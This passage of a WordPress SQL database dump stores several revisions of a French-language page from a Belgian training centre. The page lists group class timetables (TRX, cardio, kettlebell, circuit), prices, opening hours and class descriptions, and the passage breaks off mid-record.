(195, 1, '2013-07-03 17:40:44', '2013-07-03 17:40:44', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 38%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:44', '2013-07-03 17:40:44', '', 11, 'http://www.crosstrainingcenter.be/?p=195', 0, 'revision', '', 0),
(196, 1, '2013-07-03 17:40:57', '2013-07-03 17:40:57', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 41%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:57', '2013-07-03 17:40:57', '', 11, 'http://www.crosstrainingcenter.be/?p=196', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(197, 1, '2013-07-03 17:41:14', '2013-07-03 17:41:14', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 43%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:41:14', '2013-07-03 17:41:14', '', 11, 'http://www.crosstrainingcenter.be/?p=197', 0, 'revision', '', 0),
(199, 1, '2013-07-03 17:49:28', '2013-07-03 17:49:28', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 45%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance 